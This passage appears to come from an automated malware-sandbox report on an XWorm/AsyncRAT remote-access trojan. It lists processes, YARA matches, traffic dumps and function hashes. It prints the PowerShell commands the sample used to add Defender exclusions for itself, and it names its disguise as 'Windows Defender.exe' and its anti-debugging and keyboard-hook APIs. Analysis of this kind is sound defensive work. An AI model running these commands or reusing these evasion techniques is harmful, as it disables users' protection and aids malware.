2024-11-23 20:10:15 UTC	1369	IN	Data Raw: 48 71 4e 66 74 47 4f 77 55 64 38 67 46 39 59 65 64 38 6a 73 39 4b 67 44 6d 6c 71 79 4d 46 70 46 6e 58 6a 35 56 31 54 53 69 56 4f 62 30 61 33 50 67 53 48 76 4f 75 6b 68 62 70 50 48 58 78 79 76 69 72 4c 7a 46 69 41 55 30 51 32 66 72 44 4f 6c 75 41 77 50 4c 72 39 46 4b 5f 78 32 30 35 6b 48 52 51 4f 67 4c 47 41 6f 61 64 6e 38 2e 45 53 57 70 39 69 65 52 4d 36 56 69 37 56 34 4f 37 6c 32 6a 54 62 57 77 74 2e 44 7a 6d 55 76 6a 62 38 32 68 56 7a 2e 59 33 63 44 44 45 35 73 69 48 33 70 32 7a 4b 44 61 55 77 46 57 51 37 56 47 79 77 2e 71 33 33 64 66 5a 68 37 69 64 51 34 4a 61 66 33 33 58 41 57 66 64 77 68 69 73 61 45 67 52 62 6c 6d 41 4e 35 6b 52 73 79 34 34 2e 37 6d 76 6d 55 35 54 35 38 69 68 6b 74 31 37 65 43 54 37 43 4b 31 52 44 51 70 33 72 42 45 66 48 66 34 79 74 Data Ascii: HqNftGOwUd8gF9Yed8js9KgDmlqyMFpFnXj5V1TSiVOb0a3PgSHvOukhbpPHXxyvirLzFiAU0Q2frDOluAwPLr9FK_x205kHRQOgLGAoadn8.ESWp9ieRM6Vi7V4O7l2jTbWwt.DzmUvjb82hVz.Y3cDDE5siH3p2zKDaUwFWQ7VGyw.q33dfZh7idQ4Jaf33XAWfdwhisaEgRblmAN5kRsy44.7mvmU5T58ihkt17eCT7CK1RDQp3rBEfHf4yt
2024-11-23 20:10:15 UTC	653	IN	Data Raw: 72 79 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 6c 69 63 65 28 30 2c 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f Data Ascii: ry = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_o

Target ID:	0
Start time:	15:08:06
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\owuP726k3d.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\owuP726k3d.exe"
Imagebase:	0x8d0000
File size:	46'080 bytes
MD5 hash:	04F89F83BA27038601E2321B08D0B4CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2727195989.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	15:08:13
Start date:	23/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe'
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:08:13
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:08:21
Start date:	23/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'owuP726k3d.exe'
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:08:21
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:08:31
Start date:	23/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender.exe'
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:08:31
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:08:46
Start date:	23/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:08:46
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:09:24
Start date:	23/11/2024
Path:	C:\Users\user\AppData\Roaming\Windows Defender.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Windows Defender.exe"
Imagebase:	0xfe0000
File size:	46'080 bytes
MD5 hash:	04F89F83BA27038601E2321B08D0B4CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:09:32
Start date:	23/11/2024
Path:	C:\Users\user\AppData\Roaming\Windows Defender.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Windows Defender.exe"
Imagebase:	0x500000
File size:	46'080 bytes
MD5 hash:	04F89F83BA27038601E2321B08D0B4CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.7%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFB4AD19169 Relevance: 3.9, Strings: 2, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 00007FFB4AD1A30D
CAO_^, xrefs: 00007FFB4AD1A331

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID:
String ID: B$CAO_^
API String ID: 0-2056031807
Opcode ID: 6f8f7b003bd00806713a10b8701ad4d9fd33956cefaefec7751ee0ebb1fe1ddf
Instruction ID: bdc565c896348d258bfabd81789ff83a9315868e7c5dbc3ba64519e2bd44cb54
Opcode Fuzzy Hash: 6f8f7b003bd00806713a10b8701ad4d9fd33956cefaefec7751ee0ebb1fe1ddf
Instruction Fuzzy Hash: 5DA250B0B18A098FEB58EF38C495779BBE2FF98700F5445B9D44DD3295DE38A8818B41

Function 00007FFB4AD15B26 Relevance: 3.0, Strings: 2, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

vqAN, xrefs: 00007FFB4AD15F8B
vqAN, xrefs: 00007FFB4AD15B68

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID:
String ID: vqAN$vqAN
API String ID: 0-2235845662
Opcode ID: 6400d17164ef789ab5f0d3c26a2e86e3b48ae8eeb0c8d7b7f1cb3ef1b77fa579
Instruction ID: 15490f3919a66fec9efc614322d11704a0b9c9781b3d943fc8d3c337169d07f4
Opcode Fuzzy Hash: 6400d17164ef789ab5f0d3c26a2e86e3b48ae8eeb0c8d7b7f1cb3ef1b77fa579
Instruction Fuzzy Hash: A3E19270A1CA4D8FEBA8EF28C8457F977D1FB58310F14826EE84DC7291CB3899458B81

Function 00007FFB4AD168D2 Relevance: 2.9, Strings: 2, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

vqAN, xrefs: 00007FFB4AD16D07
vqAN, xrefs: 00007FFB4AD16918

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID:
String ID: vqAN$vqAN
API String ID: 0-2235845662
Opcode ID: 820788eb21cfea735bc7fd7c174889e9a588682628a4095ebb8e998a80c5257b
Instruction ID: 2a08a865aa4d65f1dbac19800828eaa7d2392ea347c897f57783f915c8c93901
Opcode Fuzzy Hash: 820788eb21cfea735bc7fd7c174889e9a588682628a4095ebb8e998a80c5257b
Instruction Fuzzy Hash: 47E19170A0CA4D8FEBA8EF28C8557F97BD1FB54310F14826AE80DC7295DF7899458B81

Function 00007FFB4AD112C9 Relevance: 1.9, Strings: 1, Instructions: 649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CAO_^, xrefs: 00007FFB4AD1152D

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID:
String ID: CAO_^
API String ID: 0-3111533842
Opcode ID: f35824ef8ade0f39f5441ccdbe99952d00392953d1d41845dfe19e9586cba55f
Instruction ID: 98e38adb6b7792477a2f0871b909320f8569a60eb36623aecfa93a0914bee640
Opcode Fuzzy Hash: f35824ef8ade0f39f5441ccdbe99952d00392953d1d41845dfe19e9586cba55f
Instruction Fuzzy Hash: 4712B1B0B2DA594BE798FF38C5592B97AD6FF98700F5405BDE44EC3286DE28AC018741

Function 00007FFB4AD17063 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFB4AD17560

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 76791718af825393430f81255ffad39bbd7397d7767f069e96671e3b20f56203
Instruction ID: 77600499dd87700e332b60d89d6b081c11e70a505028080fc8fa8b6d4a67a4d7
Opcode Fuzzy Hash: 76791718af825393430f81255ffad39bbd7397d7767f069e96671e3b20f56203
Instruction Fuzzy Hash: E931447190861C8FDB18DF6CC8897F9BBE0EF65311F14426ED48AD7252CB34A846CB91

Function 00007FFB4AD11DC1 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6354c244b4cf0a893dcc56b15b3e5b79b3d74da0373c00072ca595e322c09a3e
Instruction ID: 1b21e7441e97a8577503174aeea857f0ec8aff26147f999da4933efdff7c484c
Opcode Fuzzy Hash: 6354c244b4cf0a893dcc56b15b3e5b79b3d74da0373c00072ca595e322c09a3e
Instruction Fuzzy Hash: 7AC1B2B1B1DA4A4FEB89FF38C5556797AD6EF9C300F1401B9E44EC72C2DE29A8428741

Function 00007FFB4AD11B39 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1f69b855d7f0d1ec0f9fac2090c750f4939fcd4cd2a7c9d7bf0dde4cb0d75c
Instruction ID: db21e8b1588ed332dde493688b7cf73ded6e0defe3bce9c35153cd46dcf8e2a9
Opcode Fuzzy Hash: 0a1f69b855d7f0d1ec0f9fac2090c750f4939fcd4cd2a7c9d7bf0dde4cb0d75c
Instruction Fuzzy Hash: 1751F0A0B1E6C94FD786AB7898686B5BFD5DF8B215B1800FFE08DC7293DD185846C342

Function 00007FFB4AD1A98D Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFB4AD1AA62

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: fc36a111bc78568409145b3228ebc40a20702eba3c9d4fa55ca33ebdf582d566
Instruction ID: 48ad3e5d2ca1e032bd926c2c938a246f57784ed6b9eb8b17afa579162a6e00d8
Opcode Fuzzy Hash: fc36a111bc78568409145b3228ebc40a20702eba3c9d4fa55ca33ebdf582d566
Instruction Fuzzy Hash: 6241E37190C7488FC719DFA8D845AE9BBF0EF5A311F0441AEE08AC3592CB646846CB91

Function 00007FFB4AD18D50 Relevance: 1.6, APIs: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFB4AD1B271

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 9b1335ac21aa73f6e11ea0044345121dc1a9d43722493fe65b900d37101771ae
Instruction ID: ef0cec04bcad5e38bde0818731421041e77b5d550400cd8bc77399af325c785c
Opcode Fuzzy Hash: 9b1335ac21aa73f6e11ea0044345121dc1a9d43722493fe65b900d37101771ae
Instruction Fuzzy Hash: C6311571A1CA5C8FDB18EF68D8097B9BBE1EF69310F10417EE049C3192CA64A8468781

Function 00007FFB4AD1B1B6 Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFB4AD1B271

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c8d2aa93787c4e3ce1999362db55774b04338e6785e1375d07c5be7f978ec203
Instruction ID: 63fd5c85c84987644f1a7b085c4110d70565e2d9905f2ba470e5a140a5de554e
Opcode Fuzzy Hash: c8d2aa93787c4e3ce1999362db55774b04338e6785e1375d07c5be7f978ec203
Instruction Fuzzy Hash: AC312630A0CA1C8FDB08EF6CD8056F8BBE1FF99310F04427ED00DD3252CA64A8068781

Function 00007FFB4AD18CA9 Relevance: 1.6, APIs: 1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFB4AD1AA62

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: ecef9205a09114676a6aab39da209b9a40fb00e1676f8fc817034cd68643663d
Instruction ID: 0bdfebde3ec93c55e27e7b7bb2d8dccf2e22fd40f5e94783c34248878dfbc83c
Opcode Fuzzy Hash: ecef9205a09114676a6aab39da209b9a40fb00e1676f8fc817034cd68643663d
Instruction Fuzzy Hash: F831F27190CA488FDB19EFA8D8456F9BBF0FF55311F14016EE08AD3692CB3468468B91

Function 00007FFB4AD174CB Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFB4AD17560

Memory Dump Source

Source File: 00000000.00000002.2744736799.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad10000_owuP726k3d.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: aab0c115b5925e4afa9b260150a3c7be07da38b412b31e9af59794cff69da385
Instruction ID: 8620b35d2ae54149c78606db19ff5fba83a0b712f1367b5b62a57751f3abd930
Opcode Fuzzy Hash: aab0c115b5925e4afa9b260150a3c7be07da38b412b31e9af59794cff69da385
Instruction Fuzzy Hash: A431F471908B1C8FDB58DF5CC8857F9BBE0EF65311F14416AD489D7251CB70A8468B91

Analysis Process: powershell.exePID: 5916, Parent PID: 6848COMMON

Executed Functions

Function 00007FFB4ADF660A Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1614048624.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68aceae59d68ee00361e12f024ada72ea21938eed9e20945d4a00675033f9b73
Instruction ID: a89b010fca81418c01e0e0881f16d96fbb51a679099b04c6e4240af5034dc99f
Opcode Fuzzy Hash: 68aceae59d68ee00361e12f024ada72ea21938eed9e20945d4a00675033f9b73
Instruction Fuzzy Hash: FDC156A2A0DACA4FE765BF78CC155B67BD5EF19210B2800FEE44CCB4D3DA18AC058351

Function 00007FFB4ADF664A Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1614048624.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69045b6d6488a4819a3147c724c443928fef2f8124d1ee4ea1054877291b1b34
Instruction ID: 5f1470b243a61c57278685aee79b29b7152a33ed09ce27d375fcd6e5ef83f914
Opcode Fuzzy Hash: 69045b6d6488a4819a3147c724c443928fef2f8124d1ee4ea1054877291b1b34
Instruction Fuzzy Hash: 448145A2A0EBC64FE7A5AF788D651767BD5EF19214B6800FEE48CCB4D3DA089C058351

Function 00007FFB4AD2A0D3 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1613519609.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4ad20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41dbe50541c9a9671af667a710f60b361759923020e17f90adee282ec04cbc6a
Instruction ID: acef6310639aced7007025d5cdd4eb2adb6abf263a02c635b52b7c6d29032a24
Opcode Fuzzy Hash: 41dbe50541c9a9671af667a710f60b361759923020e17f90adee282ec04cbc6a
Instruction Fuzzy Hash: 7D114C6690E7C89FD753AF3888290A4BFB0EF53211B5D01EBD488CB0B3D9595818C7A3

Function 00007FFB4ADF4073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1614048624.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e3b85eae44fbc2d7f6cbe4c5c00c8931c10d51a9bd952c9e29422e9c6eaf14
Instruction ID: 98175a45c148beade8c970a29fd880a7409fa1a428c863ed26593fd0b030c872
Opcode Fuzzy Hash: a6e3b85eae44fbc2d7f6cbe4c5c00c8931c10d51a9bd952c9e29422e9c6eaf14
Instruction Fuzzy Hash: B65118A2B0DA464FEB99EE3CD55167677D6EF94220B6801FAE04DC7293DE14EC058381

Function 00007FFB4ADF4370 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1614048624.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07a64b9a32466908403fd3e178ac3ed938af3873443bf52d0abca549cdfdd2d
Instruction ID: 1bbb60346a941f3203e9f5565976e1515b4382b6c78207a345ea1510c4225647
Opcode Fuzzy Hash: a07a64b9a32466908403fd3e178ac3ed938af3873443bf52d0abca549cdfdd2d
Instruction Fuzzy Hash: AE4145B2B1DA494FE7A9EE7CD4116B677D5EF84320B2801FAE44EC7193E914EC058381

Function 00007FFB4AD29758 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1613519609.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4ad20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365646f5c406f6d53e38ccaa7fff5f8679d9821e0431ba5dbc45bb18e2480868
Instruction ID: 79e6b769ff174e4154121261b67b9e19ab6aef83022d5419435fc72b1fd1878e
Opcode Fuzzy Hash: 365646f5c406f6d53e38ccaa7fff5f8679d9821e0431ba5dbc45bb18e2480868
Instruction Fuzzy Hash: 2631097191CB4C5FDB58AF5CA8466E97BE0FB99310F10822FE44993252CA30A855CBC2

Function 00007FFB4AC0E383 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1612679829.00007FFB4AC0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4ac0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b225648bfd2bda07b9cfcb4b7d8097b0fba646a93e5765419d86eef6bd6e8ab1
Instruction ID: 7d767c047a7d8e7978642976b06ea9a9ee783c3c3c0a3cfa3bb5d7cf21594542
Opcode Fuzzy Hash: b225648bfd2bda07b9cfcb4b7d8097b0fba646a93e5765419d86eef6bd6e8ab1
Instruction Fuzzy Hash: EF41EFB180DBC48FE796DF389C419523FB4EF52224B2905EFD088CB5A3D625A846C792

Function 00007FFB4AD2A62C Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1613519609.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4ad20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be067bd91f2ce1f2d5ac29a43ef0862edab12f4ab606d8934e892818b6b9fb9
Instruction ID: 4592385f885ac051710705998c4f38e661bfbb89049b6bb51ce1f2f239260f52
Opcode Fuzzy Hash: 8be067bd91f2ce1f2d5ac29a43ef0862edab12f4ab606d8934e892818b6b9fb9
Instruction Fuzzy Hash: B321067190CB4C4FEB59DFACD84A7E97BF0EB96321F04426BD448C3152DA74A41ACB92

Function 00007FFB4ADF40BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1614048624.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 650a6e2f3b89efcab9140db0812e72341d8f68e557dd6ea670a910adf9b587e6
Instruction ID: bd3d063c0bf17716a735de0d2e8171dda4720b5541022e89ab8bc1096b602f41
Opcode Fuzzy Hash: 650a6e2f3b89efcab9140db0812e72341d8f68e557dd6ea670a910adf9b587e6
Instruction Fuzzy Hash: FE21E4E2B4DA474FEBA9EF3CC65117626D9EF64310B6900FAE04DC76A2CE18EC048341

Function 00007FFB4ADF43BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

